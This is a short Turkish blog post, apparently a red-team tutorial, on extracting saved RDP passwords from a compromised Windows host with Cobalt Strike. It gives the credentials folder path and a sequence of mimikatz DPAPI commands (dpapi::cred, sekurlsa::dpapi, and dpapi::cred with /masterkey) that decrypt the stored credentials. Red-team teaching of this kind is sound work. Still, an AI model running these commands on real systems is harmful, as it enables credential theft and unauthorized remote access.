|

Cobalt Strike ile RDP Credentials Almak



alicangonullu tarafından 2022-10-07 21:56:52 tarihinde yazıldı. Tahmini okunma süresi 1 dakika, 24 saniye. 273 kere görüntülendi.




Disclaimer


The information provided in this blog post is intended for educational and informational purposes only. It is not intended to encourage or promote any illegal or unethical activities, including hacking, cyberattacks, or any form of unauthorized access to computer systems, networks, or data.

Yasal Uyarı
Bu blog yazısında sağlanan bilgiler yalnızca eğitim ve bilgilendirme amaçlıdır. Bilgisayar korsanlığı, siber saldırılar veya bilgisayar sistemlerine, ağlara veya verilere herhangi bir şekilde yetkisiz erişim de dahil olmak üzere herhangi bir yasa dışı veya etik olmayan faaliyeti teşvik etme veya reklamlama amacı taşımaz.
Yasal bilgiler için yasal sayfasını inceleyebilirsiniz .

Merhabalar,

Bu yazımda Red Team testlerinden biri olan Cobalt Strike ile hedef cihazda kayıtlı RDP bilgilerini almayı anlatacağım şimdiden keyifli okumalar dilerim.

Öncelikle hedef makinemizde IT'nin bağlantı kurduğunu ve bu bağlantıları hatırla dediği bir senaryo hayal ediyoruz. Biz Red Team üyesi olarak bilgisayara daha önceki konularda anlattığım yöntemlerden biriyle sızdık ve bu RDP bilgisini elde ettik. Ardından antivirüsleri ve firewall'ı devre dışı bıraktık. Bu adımlardan sonra sırası ile yapmamız gereken adımlar şunlardır,

Konumu, C:\Users\%user&\AppData\Local\Microsoft\Credentials\ 

Komutumuz, mimikatz dpapi::cred /in:C:\Users\%user%\AppData\Local\Microsoft\Credentials\CREDENTIAL_KEY

Kırmızı daire içerisindeki key aklımızda bulunsun bir sonraki aşamada işimize yarayacak

Komutumuz, mimikatz sekurlsa::dpapi

Komutumuz, mimikatz dpapi::cred /in:C:\Users\Muhasebe\AppData\Local\Microsoft\Credentials\CREDENTIAL_KEY
/masterkey:MASTER_KEY

Ve tüm RDP bilgileriyle beraber şifremizi de elde etmiş olduk.

Bu konuda daha fazla yazı için takip etmeyi unutmayın!